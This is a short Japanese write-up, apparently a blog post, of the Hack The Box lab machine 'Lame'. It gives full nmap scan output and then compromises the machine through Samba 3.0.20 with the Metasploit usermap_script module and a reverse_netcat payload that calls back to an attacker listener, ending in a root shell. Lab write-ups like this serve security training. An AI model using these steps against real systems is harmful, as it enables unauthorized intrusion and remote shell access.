大まかに
- Nmap
- Google Search
- Metasploit
- User Flag & Root Flag
Nmap
# sudo nmap -sC -sV -O -T4 -p- -vv -oN nmap-tcp.log 10.10.10.3
▼実行結果
PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 63 vsftpd 2.3.4 | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.16.2 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status |_ftp-anon: Anonymous FTP login allowed (FTP code 230) 22/tcp open ssh syn-ack ttl 63 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA) | ssh-dss AAAAB3NzaC1kc3MAAACBALz4hsc8a2Srq4nlW960qV8xwBG0JC+jI7fWxm5METIJH4tKr/xUTwsTYEYnaZLzcOiy21D3ZvOwYb6AA3765zdgCd2Tgand7F0YD5UtXG7b7fbz99chReivL0SIWEG/E96Ai+pqYMP2WD5KaOJwSIXSUajnU5oWmY5x85sBw+XDAAAAFQDFkMpmdFQTF+oRqaoSNVU7Z+hjSwAAAIBCQxNKzi1TyP+QJIFa3M0oLqCVWI0We/ARtXrzpBOJ/dt0hTJXCeYisKqcdwdtyIn8OUCOyrIjqNuA2QW217oQ6wXpbFh+5AQm8Hl3b6C6o8lX3Ptw+Y4dp0lzfWHwZ/jzHwtuaDQaok7u1f971lEazeJLqfiWrAzoklqSWyDQJAAAAIA1lAD3xWYkeIeHv/R3P9i+XaoI7imFkMuYXCDTq843YU6Td+0mWpllCqAWUV/CQamGgQLtYy5S0ueoks01MoKdOMMhKVwqdr08nvCBdNKjIEd3gH6oBk/YRnjzxlEAYBsvCmM4a0jmhz0oNiRWlc/F+bkUeFKrBx/D2fdfZmhrGg== | 2048 5656240f211ddea72bae61b1243de8f3 (RSA) |_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAstqnuFMBOZvO3WTEjP4TUdjgWkIVNdTq6kboEDjteOfc65TlI7sRvQBwqAhQjeeyyIk8T55gMDkOD0akSlSXvLDcmcdYfxeIF0ZSuT+nkRhij7XSSA/Oc5QSk3sJ/SInfb78e3anbRHpmkJcVgETJ5WhKObUNf1AKZW++4Xlc63M4KI5cjvMMIPEVOyR3AKmI78Fo3HJjYucg87JjLeC66I7+dlEYX6zT8i1XYwa/L1vZ3qSJISGVu8kRPikMv/cNSvki4j+qDYyZ2E5497W87+Ed46/8P42LNGoOV8OcX/ro6pAcbEPUdUEfkJrqi2YXbhvwIJ0gFMb6wfe5cnQew== 139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) 3632/tcp open distccd syn-ack ttl 63 distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Missing a closed TCP port so results incomplete Aggressive OS guesses: DD-WRT v24-sp1 (Linux 2.4.36) (92%), OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC5) (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%) No exact OS matches for host (test conditions non-ideal). TCP/IP fingerprint: SCAN(V=7.93%E=4%D=5/14%OT=21%CT=%CU=%PV=Y%G=N%TM=6460B397%P=x86_64-pc-linux-gnu) SEQ(SP=C7%GCD=1%ISR=CE%TI=Z%II=I%TS=7) OPS(O1=M53AST11NW5%O2=M53AST11NW5%O3=M53ANNT11NW5%O4=M53AST11NW5%O5=M53AST11NW5%O6=M53AST11) WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0) ECN(R=Y%DF=Y%TG=40%W=16D0%O=M53ANNSNW5%CC=N%Q=) T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=) T2(R=N) T3(R=N) T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=) U1(R=N) IE(R=Y%DFI=N%TG=40%CD=S) Uptime guess: 0.006 days (since Sun May 14 06:02:20 2023) TCP Sequence Prediction: Difficulty=204 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 2h00m22s, deviation: 2h49m43s, median: 21s | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 59488/tcp): CLEAN (Timeout) | Check 2 (port 50525/tcp): CLEAN (Timeout) | Check 3 (port 53941/udp): CLEAN (Timeout) | Check 4 (port 40169/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | Computer name: lame | NetBIOS computer name: | Domain name: hackthebox.gr | FQDN: lame.hackthebox.gr |_ System time: 2023-05-14T06:10:11-04:00 |_smb2-time: Protocol negotiation failed (SMB2) | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-security-mode: Couldn't establish a SMBv2 connection.
Google Search
samba 3.0.20-Debianで検索をかけたところ以下のリンクを見つけた。
MetaSploit
# use exploit/multi/samba/usermap_script
- 以下を設定
Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 10.10.10.3 yes The target host(s), see https://docs.met asploit.com/docs/using-metasploit/basics /using-metasploit.html RPORT 139 yes The target port (TCP) Payload options (cmd/unix/reverse_netcat): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.10.16.10 yes The listen address (an interface may be s pecified) LPORT 4444 yes The listen port
- 実行
# run
- shellに切り替え
# shell
- user確認
# whomai root
以上